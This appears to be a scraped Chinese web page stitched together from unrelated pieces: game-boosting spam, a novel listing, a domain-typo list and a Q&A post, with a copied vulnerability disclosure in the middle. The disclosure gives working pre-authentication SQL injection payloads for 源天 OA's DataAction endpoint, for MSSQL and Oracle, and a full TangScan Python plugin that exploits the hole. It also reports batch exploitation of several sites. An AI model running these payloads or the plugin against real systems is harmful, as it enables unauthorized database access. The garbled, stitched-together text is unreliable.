lol免费代练练,😉

分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
首先. 支持是必须的
其次. 为写插件抛出一枚0day
最后. 夜观天象,貌似要下雨,不知会打雷不~~~
详细说明:
1)通用型SQL注入漏洞
厂商:源天软件
网址:http://**.**.**.**/
漏洞链接:ServiceAction/com.velcro.base.DataAction
说明:该oa系统使用mssql和oracle两个类型的数据库。
案例分别给出两种类型的利用poc。
code 区域MsSql数据库:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
code 区域Oracle数据库:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
漏洞证明(直接访问即可):
code 区域MsSql部分
A)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
B)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
C)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
code 区域Oracle部分
D)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
E)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
2)说好的为了支持 TangScan 而来
直接给出编写好的插件代码(本人代码盲,瞎写的,大牛勿喷),等公布时,该插件已经入库 TangS**.**.**.** 。
code 区域#! /usr/bin/env python
# -*- coding: utf-8 -*-
Copyright (c)
TangScan developers (http://**.**.**.**/)
See the file 'docs/COPYING' for copying permission
author: fate0 &fate0@**.**.**.**&
from thirdparty import requests
from modules.exploit import TSExploit
__all__ = ['TangScan']
class TangScan(TSExploit):
def __init__(self):
super(self.__class__, self).__init__()
&name&: &源天软件OA办公系统 sql 注入MSSQL版漏洞(无需登录)&,
&product&: &源天&,
&product_version&: &&,
&desc&: &&&
OA办公系统 /ServiceAction/com.velcro.base.DataAction 中的 sql 参数存在注入, 将导致敏感数据泄漏
&license&: self.license.TS,
&author&: [&Coody&],
{self.ref.wooyun: &暂无&},
&type&: self.type.injection,
&severity&: self.severity.high,
&privileged&: False,
&disclosure_date&: &&,
&create_date&: &&,
self.register_option({
&default&: &&,
&required&: True,
&choices&: [],
&convert&: self.convert.url_field,
&desc&: &目标 url&
self.register_result({
&status&: False,
&db_info&: {
&version&: &&,
&current_db&: &&
&description&: &&,
&error&: &&
def verify(self):
self.print_debug(&verify start&)
re_version_pattern = **.**.**.**pile(r'&data&(.+?)&/data&', re.IGNORECASE | re.DOTALL | re.MULTILINE)
exp_url = (&{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true&.format(domain=self.option.url))
response = requests.get(exp_url, timeout=15, verify=False)
except Exception, e:
self.result.error = str(e)
re_result = re_version_pattern.findall(response.content)
if len(re_result) == 0:
self.result.status = False
self.result.status = True
self.result.data.db_info.version = re_result[0]
self.result.description = &目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}&.format(
url=self.option.url,
db_version=re_result[0]
def exploit(self):
self.print_debug(&exploit start&)
re_userinfo_pattern = **.**.**.**pile(r'&data&(.+?)&/data&', re.IGNORECASE | re.DOTALL | re.MULTILINE)
exp_url = (&{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true&.format(domain=self.option.url))
response = requests.get(exp_url, timeout=15, verify=False)
except Exception, e:
self.result.error = str(e)
re_result = re_userinfo_pattern.findall(response.content)
if len(re_result) == 0:
self.result.status = False
self.result.status = True
self.result.data.db_info.current_db = re_result[0]
self.result.description = &目标 {url} 存在sql注入, 数据库名称为: {current_db}&.format(
url=self.option.url,
current_db=self.result.data.db_info.current_db
if __name__ == '__main__':
from modules.main import main
main(TangScan())
看下执行插件后的结果:
code 区域执行 --mode verify (默认)
code 区域执行 --mode exploit
插件运行正常,能够顺利输出数据。。。。。。
code 区域到这里本来应该结束了
但是我手贱
给出批量检测网站的脚本测试结果
测试的网站分别是:
**.**.**.**:8080/
**.**.**.**:8081/
**.**.**.**:8080/
测试中,直接执行 --mode exploit ,批量获取数据库名称吧。
测试完毕,看下结果文件 success.txt 内容
嗯、到这里该结束了···
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:11
确认时间: 20:50
厂商回复:
CNVD确认所述漏洞情况,暂未建立与软件生产厂商或网站管理单位的直接处置渠道,待认领。
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
为支持Coody而来
为支持Coody而来
同学,我跟你说,我好喜欢你哦。
@xsser 求闪电劈死我吧。。。。哈哈。。。。我好贱。。。。
为支持Coody而来
下雨了 未打雷
为支持Coody而来
为支持Coody而来
为支持Coody而来
其次. 为写插件抛出一枚0day
天不刮风,天不下雨,天上有太阳.
大贱人,哼
插件逻辑很简单嘛没有任何算法可言,就是看正则,验证的准确率。
登录后才能发表评论,请先作品分类:等待归类
作品作者:吉尔吉加
作品简介:关于[洪荒]快喊我代练爸爸:
2016年1月预开的洪荒坑~(≧▽≦)/~大家不收一发咩洪荒时期的代练是什么?就是别人有事他帮忙。后羿射日墨镜他来做,夸父追日地图他来找,姜太公钓鱼没有鱼钩他抓鱼往太公鱼竿上面放——然后伸 …
推荐阅读(41)
本书目录(128)
更多来源(30)
相关作品(20)
& 1[未下载]& 2[未下载]& 3[未下载]& 4[未下载]& 5[未下载]& 6[未下载]& 7[未下载]& 8[未下载]-----------------------------------------------------& 120[未下载]& 121[未下载]& 122[未下载]& 123[未下载]& 124[未下载]& 125[未下载]& 126[未下载]& 127[未下载]& 128[未下载]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
[其它站点]
& [未下载]
& [未下载]
& [未下载]
& [未下载]
最新小说在线阅读:
(肥妈向善)
(:纯情犀利哥)
(淡漠的紫色)
(风华爵士)
(海中一主)
(无所不有)
(江潭映月)
(意乱情迷)
(追溯前缘)
(柳晨雨馨)
(中箭的膝盖)
(六月兔斯基)
(吃肉的羊)
(月满空青)
(大大的海蜇)
&&&&如果您在本机使用过魔爪,点击开始阅读。否则请升级魔爪版本 5.2.8.0 以上
&&&&或者请复制以下地址到魔爪地址栏中进行阅读:[]
Copyright &
All Rights Reserved· 选择语言
Alexa Rank :
服务器属性
Microsoft-IIS/6.0
113.10.188.102
Whois Server:
clientDeleteProhibited
<<< <<< <youyou5.5comyouyou55c.om youyou55.ocmyouyou55.cmo< <<< <<< <youyou55.ocom youyou55.cmom<< <<< <youyou55..comyouyou55.ccom youyou55.coom<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< <<< << <<< <<< <<youyou55com youyou55.omyouyou55.xom youyou55.vomyouyou55.domyouyou55.fom youyou55.somyouyou55.gom youyou55.cmyouyou55.cimyouyou55.cpm youyou55.c0myouyou55.c9myouyou55.clm youyou55.ckmyouyou55.cemyouyou55.co youyou55.con
最近查询域名cf免费代练_百度知道
cf免费代练
备注求代练!!可以的加q!!免费!
我有更好的答案
不要钱,提供帮忙代练刚学会代练!,大家交流下心得就好!加QQ
其他类似问题
为您推荐:
代练的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁}

我要回帖

更多关于 免费代练 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信